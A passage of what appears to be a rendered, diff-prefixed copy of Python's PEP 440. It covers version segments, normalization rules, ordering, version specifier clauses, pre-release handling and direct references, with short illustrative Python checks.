+X.YrcN  # Release Candidate
+X.Y     # Final release
+
+
+

A version identifier that consists solely of a release segment and a +pre-release segment is termed a “pre-release”.

+

The pre-release segment consists of an alphabetical identifier for the +pre-release phase, along with a non-negative integer value. Pre-releases for +a given release are ordered first by phase (alpha, beta, release candidate) +and then by the numerical component within that phase.

+

Installation tools MAY accept both c and rc releases for a common +release segment in order to handle some existing legacy distributions.

+

Installation tools SHOULD interpret c versions as being equivalent to +rc versions (that is, c1 indicates the same version as rc1).

+

Build tools, publication tools and index servers SHOULD disallow the creation +of both rc and c releases for a common release segment.

+
+
+

Post-releases

+

Some projects use post-releases to address minor errors in a final release +that do not affect the distributed software (for example, correcting an error +in the release notes).

+

If used as part of a project’s development cycle, these post-releases are +indicated by including a post-release segment in the version identifier:

+
X.Y.postN    # Post-release
+
+
+

A version identifier that includes a post-release segment without a +developmental release segment is termed a “post-release”.

+

The post-release segment consists of the string .post, followed by a +non-negative integer value. Post-releases are ordered by their +numerical component, immediately following the corresponding release, +and ahead of any subsequent release.

+
+

Note

+

The use of post-releases to publish maintenance releases containing +actual bug fixes is strongly discouraged. In general, it is better +to use a longer release number and increment the final component +for each maintenance release.

+
+

Post-releases are also permitted for pre-releases:

+
X.YaN.postM   # Post-release of an alpha release
+X.YbN.postM   # Post-release of a beta release
+X.YrcN.postM  # Post-release of a release candidate
+
+
+
+

Note

+

Creating post-releases of pre-releases is strongly discouraged, as +it makes the version identifier difficult to parse for human readers. +In general, it is substantially clearer to simply create a new +pre-release by incrementing the numeric component.

+
+
+
+

Developmental releases

+

Some projects make regular developmental releases, and system packagers +(especially for Linux distributions) may wish to create early releases +directly from source control which do not conflict with later project +releases.

+

If used as part of a project’s development cycle, these developmental +releases are indicated by including a developmental release segment in the +version identifier:

+
X.Y.devN    # Developmental release
+
+
+

A version identifier that includes a developmental release segment is +termed a “developmental release”.

+

The developmental release segment consists of the string .dev, +followed by a non-negative integer value. Developmental releases are ordered +by their numerical component, immediately before the corresponding release +(and before any pre-releases with the same release segment), and following +any previous release (including any post-releases).

+

Developmental releases are also permitted for pre-releases and +post-releases:

+
X.YaN.devM       # Developmental release of an alpha release
+X.YbN.devM       # Developmental release of a beta release
+X.YrcN.devM      # Developmental release of a release candidate
+X.Y.postN.devM   # Developmental release of a post-release
+
+
+
+

Note

+

While they may be useful for continuous integration purposes, publishing +developmental releases of pre-releases to general purpose public index +servers is strongly discouraged, as it makes the version identifier +difficult to parse for human readers. If such a release needs to be +published, it is substantially clearer to instead create a new +pre-release by incrementing the numeric component.

+

Developmental releases of post-releases are also strongly discouraged, +but they may be appropriate for projects which use the post-release +notation for full maintenance releases which may include code changes.

+
+
+
+

Version epochs

+

If included in a version identifier, the epoch appears before all other +components, separated from the release segment by an exclamation mark:

+
E!X.Y  # Version identifier with epoch
+
+
+

If no explicit epoch is given, the implicit epoch is 0.

+

Most version identifiers will not include an epoch, as an explicit epoch is +only needed if a project changes the way it handles version numbering in +a way that means the normal version ordering rules will give the wrong +answer. For example, if a project is using date based versions like +2014.04 and would like to switch to semantic versions like 1.0, then +the new releases would be identified as older than the date based releases +when using the normal sorting scheme:

+
1.0
+1.1
+2.0
+2013.10
+2014.04
+
+
+

However, by specifying an explicit epoch, the sort order can be changed +appropriately, as all versions from a later epoch are sorted after versions +from an earlier epoch:

+
2013.10
+2014.04
+1!1.0
+1!1.1
+1!2.0
+
+
+
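A sketch of epoch-aware ordering for final releases (pre-, post- and developmental segments are ignored here):

def epoch_key(version):
    epoch, sep, release = version.partition("!")
    if not sep:                       # no explicit epoch: implicit epoch 0
        epoch, release = "0", version
    return int(epoch), tuple(int(part) for part in release.split("."))

versions = ["1!1.0", "2013.10", "1!2.0", "2014.04", "1!1.1"]
print(sorted(versions, key=epoch_key))
# ['2013.10', '2014.04', '1!1.0', '1!1.1', '1!2.0']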
+
+

Normalization

+

In order to maintain better compatibility with existing versions, there are a number of “alternative” syntaxes that MUST be taken into account when parsing versions; they should, however, be “normalized” to the standard syntax defined above.

+
+

Case sensitivity

+

All ASCII letters should be interpreted case insensitively within a version, and the normal form is lowercase. This allows versions such as 1.1RC1, which would be normalized to 1.1rc1.

+
+
+

Integer Normalization

+

All integers are interpreted via the int() built in and normalize to the +string form of the output. This means that an integer version of 00 would +normalize to 0 while 09000 would normalize to 9000. This does not +hold true for integers inside of an alphanumeric segment of a local version +such as 1.0+foo0100 which is already in its normalized form.

+
+
+

Pre-release separators

+

Pre-releases should allow a ., -, or _ separator between the +release segment and the pre-release segment. The normal form for this is +without a separator. This allows versions such as 1.1.a1 or 1.1-a1 +which would be normalized to 1.1a1. It should also allow a separator to +be used between the pre-release signifier and the numeral. This allows versions +such as 1.0a.1 which would be normalized to 1.0a1.

+
+
+

Pre-release spelling

+

Pre-releases allow the additional spellings of alpha, beta, c, +pre, and preview for a, b, rc, rc, and rc +respectively. This allows versions such as 1.1alpha1, 1.1beta2, or +1.1c3 which normalize to 1.1a1, 1.1b2, and 1.1rc3. In every +case the additional spelling should be considered equivalent to their normal +forms.

+
+
+

Implicit pre-release number

+

Pre releases allow omitting the numeral in which case it is implicitly assumed +to be 0. The normal form for this is to include the 0 explicitly. This +allows versions such as 1.2a which is normalized to 1.2a0.

+
+
+

Post release separators

+

Post releases allow a ., -, or _ separator as well as omitting the +separator all together. The normal form of this is with the . separator. +This allows versions such as 1.2-post2 or 1.2post2 which normalize to +1.2.post2. Like the pre-release separator this also allows an optional +separator between the post release signifier and the numeral. This allows +versions like 1.2.post-2 which would normalize to 1.2.post2.

+
+
+

Post release spelling

+

Post-releases allow the additional spellings of rev and r. This allows +versions such as 1.0-r4 which normalizes to 1.0.post4. As with the +pre-releases the additional spellings should be considered equivalent to their +normal forms.

+
+
+

Implicit post release number

+

Post releases allow omitting the numeral, in which case it is implicitly assumed to be 0. The normal form for this is to include the 0 explicitly. This allows versions such as 1.2.post, which is normalized to 1.2.post0.

+
+
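Likewise, the post release rules in the last three sections normalize as follows (sketch assuming the packaging library):

from packaging.version import Version

assert str(Version("1.2-post2")) == "1.2.post2"  # normal form uses the "." separator
assert str(Version("1.0-r4")) == "1.0.post4"     # rev/r spellings map to post
assert str(Version("1.2.post")) == "1.2.post0"   # implicit numeral made explicit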
+

Implicit post releases

+

Post releases allow omitting the post signifier altogether. When using this form the separator MUST be - and no other form is allowed. This allows versions such as 1.0-1 to be normalized to 1.0.post1. This particular normalization MUST NOT be used in conjunction with the implicit post release number rule. In other words, 1.0- is not a valid version and it does not normalize to 1.0.post0.

+
+
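This rule, and the restriction on combining it with an implicit number, can be checked directly (assuming the packaging library, which raises InvalidVersion for unparseable input):

from packaging.version import Version, InvalidVersion

assert str(Version("1.0-1")) == "1.0.post1"  # bare "-N" implies a post release

try:
    Version("1.0-")  # implicit signifier plus implicit number: invalid
except InvalidVersion:
    pass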
+

Development release separators

+

Development releases allow a ., -, or a _ separator as well as omitting the separator altogether. The normal form of this is with the . separator. This allows versions such as 1.2-dev2 or 1.2dev2 which normalize to 1.2.dev2.

+
+
+

Implicit development release number

+

Development releases allow omitting the numeral, in which case it is implicitly assumed to be 0. The normal form for this is to include the 0 explicitly. This allows versions such as 1.2.dev, which is normalized to 1.2.dev0.

+
+
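The development release rules normalize the same way (sketch assuming the packaging library):

from packaging.version import Version

assert str(Version("1.2-dev2")) == "1.2.dev2"  # separator normalized to "."
assert str(Version("1.2.dev")) == "1.2.dev0"   # implicit numeral made explicit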
+

Local version segments

+

With a local version, in addition to the use of . as a separator of +segments, the use of - and _ is also acceptable. The normal form is +using the . character. This allows versions such as 1.0+ubuntu-1 to be +normalized to 1.0+ubuntu.1.

+
+
+

Preceding v character

+

In order to support the common version notation of v1.0 versions may be +preceded by a single literal v character. This character MUST be ignored +for all purposes and should be omitted from all normalized forms of the +version. The same version with and without the v is considered equivalent.

+
+
+

Leading and Trailing Whitespace

+

Leading and trailing whitespace must be silently ignored and removed from all +normalized forms of a version. This includes " ", \t, \n, \r, +\f, and \v. This allows accidental whitespace to be handled sensibly, +such as a version like 1.0\n which normalizes to 1.0.

+
+
+
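The last three rules (local separators, the leading v, and whitespace) can be demonstrated in one short sketch, again assuming the packaging library:

from packaging.version import Version

assert str(Version("1.0+ubuntu-1")) == "1.0+ubuntu.1"  # "-" and "_" become "." locally
assert Version("v1.0") == Version("1.0")               # leading "v" is ignored
assert str(Version("1.0\n")) == "1.0"                  # stray whitespace is stripped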
+

Examples of compliant version schemes

+

The standard version scheme is designed to encompass a wide range of +identification practices across public and private Python projects. In +practice, a single project attempting to use the full flexibility offered +by the scheme would create a situation where human users had difficulty +figuring out the relative order of versions, even though the rules above +ensure all compliant tools will order them consistently.

+

The following examples illustrate a small selection of the different +approaches projects may choose to identify their releases, while still +ensuring that the “latest release” and the “latest stable release” can +be easily determined, both by human users and automated tools.

+

Simple “major.minor” versioning:

+
0.1
+0.2
+0.3
+1.0
+1.1
+...
+
+
+

Simple “major.minor.micro” versioning:

+
1.1.0
+1.1.1
+1.1.2
+1.2.0
+...
+
+
+

“major.minor” versioning with alpha, beta and candidate +pre-releases:

+
0.9
+1.0a1
+1.0a2
+1.0b1
+1.0rc1
+1.0
+1.1a1
+...
+
+
+

“major.minor” versioning with developmental releases, release candidates +and post-releases for minor corrections:

+
0.9
+1.0.dev1
+1.0.dev2
+1.0.dev3
+1.0.dev4
+1.0c1
+1.0c2
+1.0
+1.0.post1
+1.1.dev1
+...
+
+
+

Date based releases, using an incrementing serial within each year, skipping +zero:

+
2012.1
+2012.2
+2012.3
+...
+2012.15
+2013.1
+2013.2
+...
+
+
+
+
+

Summary of permitted suffixes and relative ordering

+
+

Note

+

This section is intended primarily for authors of tools that +automatically process distribution metadata, rather than developers +of Python distributions deciding on a versioning scheme.

+
+

The epoch segment of version identifiers MUST be sorted according to the +numeric value of the given epoch. If no epoch segment is present, the +implicit numeric value is 0.

+

The release segment of version identifiers MUST be sorted in +the same order as Python’s tuple sorting when the normalized release segment is +parsed as follows:

+
tuple(map(int, release_segment.split(".")))
+
+
+

All release segments involved in the comparison MUST be converted to a +consistent length by padding shorter segments with zeros as needed.

+
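A minimal sketch of this padded tuple comparison; release_key is a hypothetical helper for illustration, not part of any specified API:

def release_key(release_segment, width):
    # Parse the release segment, then zero-pad to the shared length.
    parts = tuple(map(int, release_segment.split(".")))
    return parts + (0,) * (width - len(parts))

segments = ["1.0", "1.0.1", "1.1"]
width = max(s.count(".") + 1 for s in segments)
# Padded keys: (1, 0, 0) < (1, 0, 1) < (1, 1, 0)
assert sorted(segments, key=lambda s: release_key(s, width)) == segments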

Within a numeric release (1.0, 2.7.3), the following suffixes +are permitted and MUST be ordered as shown:

+
.devN, aN, bN, rcN, <no suffix>, .postN
+
+
+

Note that c is considered to be semantically equivalent to rc and must be sorted as if it were rc. Tools MAY reject the case of having the same N for both a c and an rc in the same release segment as ambiguous and remain in compliance with the PEP.

+

Within an alpha (1.0a1), beta (1.0b1), or release candidate +(1.0rc1, 1.0c1), the following suffixes are permitted and MUST be +ordered as shown:

+
.devN, <no suffix>, .postN
+
+
+

Within a post-release (1.0.post1), the following suffixes are permitted +and MUST be ordered as shown:

+
.devN, <no suffix>
+
+
+

Note that devN and postN MUST always be preceded by a dot, even +when used immediately following a numeric version (e.g. 1.0.dev456, +1.0.post1).

+

Within a pre-release, post-release or development release segment with a +shared prefix, ordering MUST be by the value of the numeric component.

+

The following example covers many of the possible combinations:

+
1.dev0
+1.0.dev456
+1.0a1
+1.0a2.dev456
+1.0a12.dev456
+1.0a12
+1.0b1.dev456
+1.0b2
+1.0b2.post345.dev456
+1.0b2.post345
+1.0rc1.dev456
+1.0rc1
+1.0
+1.0+abc.5
+1.0+abc.7
+1.0+5
+1.0.post456.dev34
+1.0.post456
+1.0.15
+1.1.dev1
+
+
+
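This ordering can be reproduced mechanically; the sketch below assumes the third-party packaging library, whose Version class implements these rules:

from packaging.version import Version

ordered = [
    "1.dev0", "1.0.dev456", "1.0a1", "1.0a2.dev456", "1.0a12.dev456",
    "1.0a12", "1.0b1.dev456", "1.0b2", "1.0b2.post345.dev456",
    "1.0b2.post345", "1.0rc1.dev456", "1.0rc1", "1.0", "1.0+abc.5",
    "1.0+abc.7", "1.0+5", "1.0.post456.dev34", "1.0.post456",
    "1.0.15", "1.1.dev1",
]
assert sorted(ordered, key=Version) == ordered  # already in the specified order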
+
+

Version ordering across different metadata versions

+

Metadata v1.0 (PEP 241) and metadata v1.1 (PEP 314) do not specify a standard version identification or ordering scheme. However, metadata v1.2 (PEP 345) does specify a scheme which is defined in PEP 386.

+

Due to the nature of the simple installer API it is not possible for an installer to be aware of which metadata version a particular distribution was using. Additionally, installers require the ability to create a reasonably prioritized list that includes all, or as many as possible, versions of a project in order to determine which version they should install. These requirements necessitate standardizing on a single parsing mechanism to be used for all versions of a project.

+

Due to the above, this PEP MUST be used for all versions of metadata and +supersedes PEP 386 even for metadata v1.2. Tools SHOULD ignore any versions +which cannot be parsed by the rules in this PEP, but MAY fall back to +implementation defined version parsing and ordering schemes if no versions +complying with this PEP are available.

+

Distribution users may wish to explicitly remove non-compliant versions from +any private package indexes they control.

+
+
+

Compatibility with other version schemes

+

Some projects may choose to use a version scheme which requires +translation in order to comply with the public version scheme defined in +this PEP. In such cases, the project specific version can be stored in the +metadata while the translated public version is published in the version field.

+

This allows automated distribution tools to provide consistently correct +ordering of published releases, while still allowing developers to use +the internal versioning scheme they prefer for their projects.

+
+

Semantic versioning

+

Semantic versioning is a popular version identification scheme that is +more prescriptive than this PEP regarding the significance of different +elements of a release number. Even if a project chooses not to abide by +the details of semantic versioning, the scheme is worth understanding as +it covers many of the issues that can arise when depending on other +distributions, and when publishing a distribution that others rely on.

+

The “Major.Minor.Patch” (described in this PEP as “major.minor.micro”) +aspects of semantic versioning (clauses 1-8 in the 2.0.0 specification) +are fully compatible with the version scheme defined in this PEP, and abiding +by these aspects is encouraged.

+

Semantic versions containing a hyphen (pre-releases - clause 10) or a +plus sign (builds - clause 11) are not compatible with this PEP +and are not permitted in the public version field.

+

One possible mechanism to translate such semantic versioning based source +labels to compatible public versions is to use the .devN suffix to +specify the appropriate version order.

+

Specific build information may also be included in local version labels.

+
+
+

DVCS based version labels

+

Many build tools integrate with distributed version control systems like Git and Mercurial in order to add an identifying hash to the version identifier. As hashes cannot be ordered reliably, such versions are not permitted in the public version field.

+

As with semantic versioning, the public .devN suffix may be used to +uniquely identify such releases for publication, while the original DVCS based +label can be stored in the project metadata.

+

Identifying hash information may also be included in local version labels.

+
+
+

Olson database versioning

+

The pytz project inherits its versioning scheme from the corresponding +Olson timezone database versioning scheme: the year followed by a lowercase +character indicating the version of the database within that year.

+

This can be translated to a compliant public version identifier as +<year>.<serial>, where the serial starts at zero or one (for the +‘<year>a’ release) and is incremented with each subsequent database +update within the year.

+

As with other translated version identifiers, the corresponding Olson +database version could be recorded in the project metadata.

+
+
+
+
+

Version specifiers

+

A version specifier consists of a series of version clauses, separated by +commas. For example:

+
~= 0.9, >= 1.0, != 1.3.4.*, < 2.0
+
+
+

The comparison operator determines the kind of version clause:

  • ~=: Compatible release clause
  • ==: Version matching clause
  • !=: Version exclusion clause
  • <=, >=: Inclusive ordered comparison clause
  • <, >: Exclusive ordered comparison clause
  • ===: Arbitrary equality clause

The comma (“,”) is equivalent to a logical and operator: a candidate +version must match all given version clauses in order to match the +specifier as a whole.

+

Whitespace between a conditional operator and the following version +identifier is optional, as is the whitespace around the commas.

+

When multiple candidate versions match a version specifier, the preferred +version SHOULD be the latest version as determined by the consistent +ordering defined by the standard Version scheme. Whether or not +pre-releases are considered as candidate versions SHOULD be handled as +described in Handling of pre-releases.

+

Except where specifically noted below, local version identifiers MUST NOT be +permitted in version specifiers, and local version labels MUST be ignored +entirely when checking if candidate versions match a given version +specifier.

+
+

Compatible release

+

A compatible release clause consists of the compatible release operator ~= +and a version identifier. It matches any candidate version that is expected +to be compatible with the specified version.

+

The specified version identifier must be in the standard format described in +Version scheme. Local version identifiers are NOT permitted in this +version specifier.

+

For a given release identifier V.N, the compatible release clause is +approximately equivalent to the pair of comparison clauses:

+
>= V.N, == V.*
+
+
+

This operator MUST NOT be used with a single segment version number such as +~=1.

+

For example, the following groups of version clauses are equivalent:

+
~= 2.2
+>= 2.2, == 2.*
+
+~= 1.4.5
+>= 1.4.5, == 1.4.*
+
+
+

If a pre-release, post-release or developmental release is named in a +compatible release clause as V.N.suffix, then the suffix is ignored +when determining the required prefix match:

+
~= 2.2.post3
+>= 2.2.post3, == 2.*
+
+~= 1.4.5a4
+>= 1.4.5a4, == 1.4.*
+
+
+

The padding rules for release segment comparisons mean that the assumed degree of forward compatibility in a compatible release clause can be controlled by appending additional zeros to the version specifier:

+
~= 2.2.0
+>= 2.2.0, == 2.2.*
+
+~= 1.4.5.0
+>= 1.4.5.0, == 1.4.5.*
+
+
+
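A brief check of both behaviours, assuming the packaging library's SpecifierSet (the in operator tests a candidate version against the specifier):

from packaging.specifiers import SpecifierSet

assert "2.3" in SpecifierSet("~= 2.2")        # >= 2.2, == 2.*
assert "3.0" not in SpecifierSet("~= 2.2")
assert "2.3" not in SpecifierSet("~= 2.2.0")  # extra zero narrows the prefix
assert "2.2.5" in SpecifierSet("~= 2.2.0")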
+
+

Version matching

+

A version matching clause includes the version matching operator == +and a version identifier.

+

The specified version identifier must be in the standard format described in +Version scheme, but a trailing .* is permitted on public version +identifiers as described below.

+

By default, the version matching operator is based on a strict equality +comparison: the specified version must be exactly the same as the requested +version. The only substitution performed is the zero padding of the +release segment to ensure the release segments are compared with the same +length.

+

Whether or not strict version matching is appropriate depends on the specific +use case for the version specifier. Automated tools SHOULD at least issue +warnings and MAY reject them entirely when strict version matches are used +inappropriately.

+

Prefix matching may be requested instead of strict comparison, by appending a trailing .* to the version identifier in the version matching clause. This means that additional trailing segments will be ignored when determining whether or not a version identifier matches the clause. If the specified version includes only a release segment, then trailing components (or the lack thereof) in the release segment are also ignored.

+

For example, given the version 1.1.post1, the following clauses would +match or not as shown:

+
== 1.1        # Not equal, so 1.1.post1 does not match clause
+== 1.1.post1  # Equal, so 1.1.post1 matches clause
+== 1.1.*      # Same prefix, so 1.1.post1 matches clause
+
+
+

For purposes of prefix matching, the pre-release segment is considered to +have an implied preceding ., so given the version 1.1a1, the +following clauses would match or not as shown:

+
== 1.1        # Not equal, so 1.1a1 does not match clause
+== 1.1a1      # Equal, so 1.1a1 matches clause
+== 1.1.*      # Same prefix, so 1.1a1 matches clause if pre-releases are requested
+
+
+

An exact match is also considered a prefix match (this interpretation is +implied by the usual zero padding rules for the release segment of version +identifiers). Given the version 1.1, the following clauses would +match or not as shown:

+
== 1.1        # Equal, so 1.1 matches clause
+== 1.1.0      # Zero padding expands 1.1 to 1.1.0, so it matches clause
+== 1.1.dev1   # Not equal (dev-release), so 1.1 does not match clause
+== 1.1a1      # Not equal (pre-release), so 1.1 does not match clause
+== 1.1.post1  # Not equal (post-release), so 1.1 does not match clause
+== 1.1.*      # Same prefix, so 1.1 matches clause
+
+
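These matching rules can be confirmed with the packaging library (an assumption, as above):

from packaging.specifiers import SpecifierSet

assert "1.1.post1" not in SpecifierSet("== 1.1")
assert "1.1.post1" in SpecifierSet("== 1.1.post1")
assert "1.1.post1" in SpecifierSet("== 1.1.*")   # prefix match
assert "1.1" in SpecifierSet("== 1.1.0")         # zero padding applies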
+

It is invalid to have a prefix match containing a development or local release +such as 1.0.dev1.* or 1.0+foo1.*. If present, the development release +segment is always the final segment in the public version, and the local version +is ignored for comparison purposes, so using either in a prefix match wouldn’t +make any sense.

+

The use of == (without at least the wildcard suffix) when defining +dependencies for published distributions is strongly discouraged as it +greatly complicates the deployment of security fixes. The strict version +comparison operator is intended primarily for use when defining +dependencies for repeatable deployments of applications while using +a shared distribution index.

+

If the specified version identifier is a public version identifier (no +local version label), then the local version label of any candidate versions +MUST be ignored when matching versions.

+

If the specified version identifier is a local version identifier, then the +local version labels of candidate versions MUST be considered when matching +versions, with the public version identifier being matched as described +above, and the local version label being checked for equivalence using a +strict string equality comparison.

+
+
+

Version exclusion

+

A version exclusion clause includes the version exclusion operator != +and a version identifier.

+

The allowed version identifiers and comparison semantics are the same as +those of the Version matching operator, except that the sense of any +match is inverted.

+

For example, given the version 1.1.post1, the following clauses would +match or not as shown:

+
!= 1.1        # Not equal, so 1.1.post1 matches clause
+!= 1.1.post1  # Equal, so 1.1.post1 does not match clause
+!= 1.1.*      # Same prefix, so 1.1.post1 does not match clause
+
+
+
+
+

Inclusive ordered comparison

+

An inclusive ordered comparison clause includes a comparison operator and a +version identifier, and will match any version where the comparison is correct +based on the relative position of the candidate version and the specified +version given the consistent ordering defined by the standard +Version scheme.

+

The inclusive ordered comparison operators are <= and >=.

+

As with version matching, the release segment is zero padded as necessary to +ensure the release segments are compared with the same length.

+

Local version identifiers are NOT permitted in this version specifier.

+
+
+

Exclusive ordered comparison

+

The exclusive ordered comparisons > and < are similar to the inclusive +ordered comparisons in that they rely on the relative position of the candidate +version and the specified version given the consistent ordering defined by the +standard Version scheme. However, they specifically exclude pre-releases, +post-releases, and local versions of the specified version.

+

The exclusive ordered comparison >V MUST NOT allow a post-release +of the given version unless V itself is a post release. You may mandate +that releases are later than a particular post release, including additional +post releases, by using >V.postN. For example, >1.7 will allow +1.7.1 but not 1.7.0.post1 and >1.7.post2 will allow 1.7.1 +and 1.7.0.post3 but not 1.7.0.

+
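The post-release behaviour of > can be illustrated as follows (sketch assuming the packaging library):

from packaging.specifiers import SpecifierSet

assert "1.7.1" in SpecifierSet("> 1.7")
assert "1.7.0.post1" not in SpecifierSet("> 1.7")    # post release of 1.7 excluded
assert "1.7.0.post3" in SpecifierSet("> 1.7.post2")  # allowed when V is itself a post release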

The exclusive ordered comparison >V MUST NOT match a local version of +the specified version.

+

The exclusive ordered comparison <V MUST NOT allow a pre-release of +the specified version unless the specified version is itself a pre-release. +Allowing pre-releases that are earlier than, but not equal to a specific +pre-release may be accomplished by using <V.rc1 or similar.

+

As with version matching, the release segment is zero padded as necessary to +ensure the release segments are compared with the same length.

+

Local version identifiers are NOT permitted in this version specifier.

+
+
+

Arbitrary equality

+

Arbitrary equality comparisons are simple string equality operations which do +not take into account any of the semantic information such as zero padding or +local versions. This operator also does not support prefix matching as the +== operator does.

+

The primary use case for arbitrary equality is to allow for specifying a +version which cannot otherwise be represented by this PEP. This operator is +special and acts as an escape hatch to allow someone using a tool which +implements this PEP to still install a legacy version which is otherwise +incompatible with this PEP.

+

An example would be ===foobar which would match a version of foobar.

+

This operator may also be used to explicitly require an unpatched version +of a project such as ===1.0 which would not match for a version +1.0+downstream1.

+

Use of this operator is heavily discouraged and tooling MAY display a warning +when it is used.

+
+
+

Handling of pre-releases

+

Pre-releases of any kind, including developmental releases, are implicitly excluded from all version specifiers, unless they are already present on the system, explicitly requested by the user, or the only available version that satisfies the version specifier is a pre-release.

+

By default, dependency resolution tools SHOULD:

+
    +
  • accept already installed pre-releases for all version specifiers
  • +
  • accept remotely available pre-releases for version specifiers where +there is no final or post release that satisfies the version specifier
  • +
  • exclude all other pre-releases from consideration
  • +
+

Dependency resolution tools MAY issue a warning if a pre-release is needed +to satisfy a version specifier.

+
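Tools built on the packaging library expose this opt-in behaviour explicitly; in that library (an assumption) the default and explicit behaviours look like this:

from packaging.specifiers import SpecifierSet

spec = SpecifierSet(">= 1.0")
assert "1.1a1" not in spec                       # pre-releases excluded by default
assert spec.contains("1.1a1", prereleases=True)  # accepted when explicitly requested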

Dependency resolution tools SHOULD also allow users to request the +following alternative behaviours:

+
    +
  • accepting pre-releases for all version specifiers
  • +
  • excluding pre-releases for all version specifiers (reporting an error or +warning if a pre-release is already installed locally, or if a +pre-release is the only way to satisfy a particular specifier)
  • +
+

Dependency resolution tools MAY also allow the above behaviour to be +controlled on a per-distribution basis.

+

Post-releases and final releases receive no special treatment in version +specifiers - they are always included unless explicitly excluded.

+
+
+

Examples

+
    +
  • ~=3.1: version 3.1 or later, but not version 4.0 or later.
  • +
  • ~=3.1.2: version 3.1.2 or later, but not version 3.2.0 or later.
  • +
  • ~=3.1a1: version 3.1a1 or later, but not version 4.0 or later.
  • +
  • == 3.1: specifically version 3.1 (or 3.1.0), excludes all pre-releases, +post releases, developmental releases and any 3.1.x maintenance releases.
  • +
  • == 3.1.*: any version that starts with 3.1. Equivalent to the +~=3.1.0 compatible release clause.
  • +
  • ~=3.1.0, != 3.1.3: version 3.1.0 or later, but not version 3.1.3 and +not version 3.2.0 or later.
  • +
+
+
+
+

Direct references

+

Some automated tools may permit the use of a direct reference as an +alternative to a normal version specifier. A direct reference consists of +the specifier @ and an explicit URL.

+

Whether or not direct references are appropriate depends on the specific +use case for the version specifier. Automated tools SHOULD at least issue +warnings and MAY reject them entirely when direct references are used +inappropriately.

+

Public index servers SHOULD NOT allow the use of direct references in +uploaded distributions. Direct references are intended as a tool for +software integrators rather than publishers.

+

Depending on the use case, some appropriate targets for a direct URL +reference may be an sdist or a wheel binary archive. The exact URLs and +targets supported will be tool dependent.

+

For example, a local source archive may be referenced directly:

+
pip @ file:///localbuilds/pip-1.3.1.zip
+
+
+

Alternatively, a prebuilt archive may also be referenced:

+
pip @ file:///localbuilds/pip-1.3.1-py33-none-any.whl
+
+
+

All direct references that do not refer to a local file URL SHOULD specify +a secure transport mechanism (such as https) AND include an expected +hash value in the URL for verification purposes. If a direct reference is +specified without any hash information, with hash information that the +tool doesn’t understand, or with a selected hash algorithm that the tool +considers too weak to trust, automated tools SHOULD at least emit a warning +and MAY refuse to rely on the URL. If such a direct reference also uses an +insecure transport, automated tools SHOULD NOT rely on the URL.

+

It is RECOMMENDED that only hashes which are unconditionally provided by +the latest version of the standard library’s hashlib module be used +for source archive hashes. At time of writing, that list consists of +'md5', 'sha1', 'sha224', 'sha256', 'sha384', and +'sha512'.

+

For source archive and wheel references, an expected hash value may be +specified by including a <hash-algorithm>=<expected-hash> entry as +part of the URL fragment.

+
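A hypothetical sketch of verifying such a fragment; the URL and digest below are placeholders, not real values:

import hashlib
from urllib.parse import urlparse

url = "https://example.com/pkg-1.0.zip#sha256=" + "0" * 64  # placeholder digest
algorithm, _, expected = urlparse(url).fragment.partition("=")
actual = hashlib.new(algorithm, b"...archive bytes...").hexdigest()
print("hash matches:", actual == expected)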

For version control references, the VCS+protocol scheme SHOULD be +used to identify both the version control system and the secure transport, +and a version control system with hash based commit identifiers SHOULD be +used. Automated tools MAY omit warnings about missing hashes for version +control systems that do not provide hash based commit identifiers.

+

To handle version control systems that do not support including commit or +tag references directly in the URL, that information may be appended to the +end of the URL using the @<commit-hash> or the @<tag>#<commit-hash> +notation.

+
+

Note

+

This isn’t quite the same as the existing VCS reference notation +supported by pip. Firstly, the distribution name is moved in front rather +than embedded as part of the URL. Secondly, the commit hash is included +even when retrieving based on a tag, in order to meet the requirement +above that every link should include a hash to make things harder to +forge (creating a malicious repo with a particular tag is easy, creating +one with a specific hash, less so).

+
+

Remote URL examples:

+
pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+pip @ git+https://github.com/pypa/pip.git@7921be1537eac1e97bc40179a57f0349c2aee67d
+pip @ git+https://github.com/pypa/pip.git@1.3.1#7921be1537eac1e97bc40179a57f0349c2aee67d
+
+
+
+

File URLs

+

File URLs take the form of file://<host>/<path>. If the <host> is omitted, it is assumed to be localhost, but even when the <host> is omitted the third slash MUST still exist. The <path> defines the file path on the filesystem that is to be accessed.

+

On the various *nix operating systems the only allowed values for <host> are for it to be omitted, localhost, or another FQDN that the current machine believes matches its own host name. In other words, on *nix the file:// scheme can only be used to access paths on the local machine.

+

On Windows the file format should include the drive letter, if applicable, as part of the <path> (e.g. file:///c:/path/to/a/file). Unlike *nix, on Windows the <host> parameter may be used to specify a file residing on a network share. In other words, in order to translate \\machine\volume\file to a file:// URL, it would end up as file://machine/volume/file. For more information on file:// URLs on Windows see MSDN [4].

+
+
+
+

Updating the versioning specification

+

The versioning specification may be updated with clarifications without +requiring a new PEP or a change to the metadata version.

+

Any technical changes that impact the version identification and comparison +syntax and semantics would require an updated versioning scheme to be +defined in a new PEP.

+
+
+

Summary of differences from pkg_resources.parse_version

+
    +
  • Note: this comparison is to pkg_resources.parse_version as it existed at the time the PEP was written. After the PEP was accepted, setuptools 6.0 and later versions adopted the behaviour described in this PEP.
  • +
  • Local versions sort differently: this PEP requires that they sort as greater than the same version without a local version, whereas pkg_resources.parse_version considers it a pre-release marker.
  • +
  • This PEP purposely restricts the syntax which constitutes a valid version +while pkg_resources.parse_version attempts to provide some meaning from +any arbitrary string.
  • +
  • pkg_resources.parse_version allows arbitrarily deeply nested version +signifiers like 1.0.dev1.post1.dev5. This PEP however allows only a +single use of each type and they must exist in a certain order.
  • +
+
+
+

Summary of differences from PEP 386

+
    +
  • Moved the description of version specifiers into the versioning PEP
  • +
  • Added the “direct reference” concept as a standard notation for direct +references to resources (rather than each tool needing to invent its own)
  • +
  • Added the “local version identifier” and “local version label” concepts to +allow system integrators to indicate patched builds in a way that is +supported by the upstream tools, as well as to allow the incorporation of +build tags into the versioning of binary distributions.
  • +
  • Added the “compatible release” clause
  • +
  • Added the trailing wildcard syntax for prefix based version matching +and exclusion
  • +
  • Changed the top level sort position of the .devN suffix
  • +
  • Allowed single value version numbers
  • +
  • Explicit exclusion of leading or trailing whitespace
  • +
  • Explicit support for date based versions
  • +
  • Explicit normalisation rules to improve compatibility with +existing version metadata on PyPI where it doesn’t introduce +ambiguity
  • +
  • Implicitly exclude pre-releases unless they’re already present or +needed to satisfy a dependency
  • +
  • Treat post releases the same way as unqualified releases
  • +
  • Discuss ordering and dependencies across metadata versions
  • +
  • Switch from preferring c to rc.
  • +
+

The rationale for major changes is given in the following sections.

+
+

